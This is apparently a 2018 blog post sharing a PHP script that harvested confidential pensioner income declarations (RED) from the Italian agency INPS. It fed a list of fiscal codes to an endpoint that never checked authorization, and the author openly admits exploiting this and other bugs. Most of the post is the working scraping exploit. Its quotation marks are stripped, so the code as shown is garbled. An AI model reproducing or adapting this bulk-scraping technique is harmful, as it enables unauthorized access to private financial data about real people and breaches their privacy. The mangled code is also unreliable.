Friday, July 27, 2018
old script retrieve confidential data from INPS about RED
old script retrieve confidential data from INPS about RED
An old php script that I used to retrieve informations about the RED (dichiarazione reddituale per pensionati) for each Fiscal Code.
INPS never checked the authorizations on the url to request the data and I used this, and several other, bug to work in a faster way ...
The url doesnt work anymore and the script is damn old that nobody will care about it.
<?php
$inputfile = codici.txt;
$outputfile = RED.txt;
$host = www.inps.it;
$path = /servizi/redest/Frm_MatricolaIpost.aspx;
$method = POST;
//$host = www.google.it;
$postdata = &Stampa=Esegui&F00=;
//reading codici fiscali from file
$arrcodicifiscali = getcodicifiscali($inputfile);
foreach($arrcodicifiscali as $codice)
{
//getting the page
$resdata = httpSocketConnection($host, GET, $path, );
$viewstatedata = ;
$regu = $resdata[1];
if( preg_match( #name="__VIEWSTATE" value="(.*?)"#, $resdata[1], $matches) )
{
$viewstatedata = $matches[1];
}
//print_r($viewstatedata);exit;
//post data with the code
$postdatacf = $postdata . $codice;
//we need to set the VIEWSTATE
//$postdatacf = __VIEWSTATE= . $viewstatedata . $postdatacf;
//echo $postdatacf; exit;
$resdata = httpSocketConnection($host,$method,$path,$postdatacf);
echo $postdatacf . ;
echo <pre> . $regu . </pre>;
echo <pre> . $resdata[1]. </pre>; exit();
}
//$resdata = httpSocketConnection($host,$method,$path,$postdata);
//file_put_contents($outputfile,$resdata);
echo ok;
//////////////////////////////////
function getcodicifiscali($inputfile)
{
$codicifiscali = array();
$handle = @fopen( $inputfile, r);
if(!$handle) {
echo cannot read the input file;
exit();
}
//while theres no end of file
while (feof($handle) === false) {
$buffer = fgets($handle, 4096);
$buffer = str_replace(" ",, $buffer);
$buffer = str_replace(" ",, $buffer);
$codicifiscali[] = $buffer;
}
fclose($handle);
return $codicifiscali;
}
function httpSocketConnection($host, $method, $path = , $data = )
{
$method = strtoupper($method);
if (($method == "GET") && ($data != ))
{
$path.= ?.$data;
}
$filePointer = fsockopen($host, 80, $errorNumber, $errorString);
if (!$filePointer)
{
throw new Exception("Error $errorNumber $errorString");
}
$requestHeader = $method." ".$path." HTTP/1.1 ";
$requestHeader.= "Host: ".$host." ";
$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 ";
$requestHeader.= "Content-Type: application/x-www-form-urlencoded ";
if ($method == "POST")
{
$requestHeader.= "Content-Length: ".strlen($data)." ";
}
$requestHeader.= "Connection: close ";
if ($method == "POST")
{
$requestHeader.= $data;
}
fwrite($filePointer, $requestHeader);
$responseHeader = ;
$responseContent = ;
do
{
$responseHeader.= fread($filePointer, 1);
}
while (!preg_match(/rnrn$/, $responseHeader));
if (!strstr($responseHeader, "Transfer-Encoding: chunked"))
{
while (!feof($filePointer))
{
$responseContent.= fgets($filePointer, 128);
}
}
else
{
while ($chunk_length = hexdec(fgets($filePointer)))
{
$responseContentChunk = ;
$read_length = 0;
while ($read_length < $chunk_length)
{
$responseContentChunk .= fread($filePointer, $chunk_length - $read_length);
$read_length = strlen($responseContentChunk);
}
$responseContent.= $responseContentChunk;
fgets($filePointer);
}
}
//cleaning the last parts
$responseHeader = chop($responseHeader);
$responseContent = chop($responseContent);
$statuscode = getstatuscode($responseHeader);
switch($statuscode)
{
case 302:
//--todo-- add the autofollow true/false
$path = ;
httpSocketConnection($host, $method, $path, $data);
break;
default:
break;
}
return array($responseHeader, $responseContent);
}
function getstatuscode($myheaders)
{
//if we have the raw headers we convert them to an array
if(is_array($myheaders) === false)
{
$myheaders = str_replace(" ", ,$myheaders);
//splitting into an array
$myheaders = split(" ", $myheaders);
}
//checking the first line with the status code
//ex. HTTP/1.1 301 Moved Permanently
if ( preg_match(#HTTP/d{1}.d{1} (d{3}) .*#, $myheaders[0], $matches) )
{
//returning the status code
return $matches[1];
}
//return false for any error
return false;
}
function cookieJar($myheaders)
{
/*
Date: Thu, 30 Jul 2009 16:41:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S:: 04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://it.msn.com/
Set-Cookie: MC1=V=3&GUID=351aadd02c2c4c6a943829592de783dd; domain=.msn.it; expires=Mon, 04-Oct-2021 11:00:00 GMT; path=/
Cache-Control: no-cache
Content-Length: 0
*/
//if we have the raw headers we convert them to an array
if(is_array($myheaders) === false)
{
$myheaders = str_replace(" ", ,$myheaders);
$myheaders = split(" ", $myheaders);
}
$MycookieJar = array();
while ($line = trim(array_shift($myheaders))) {
list($header, $value) = explode(:, $line, 2);
if ( $header == Set-Cookie || $header == set-cookie2 ) {
// v2 cookies
if ($header == set-cookie2)
{
$cookies = explode(,, $value);
} else {
$cookies = array($value);
}
foreach ($cookies as $cookie)
{
$cookie = explode(;, $cookie);
foreach ($cookie as $pos => $val)
{
$val = explode(=, $val, 2);
$val[1] = trim(@$val[1]);
$MycookieJar[] = $val;
}
}
}
}
return $MycookieJar;
//echo $myheaders . " ";
//print_r($MycookieJar);exit;
}
?>
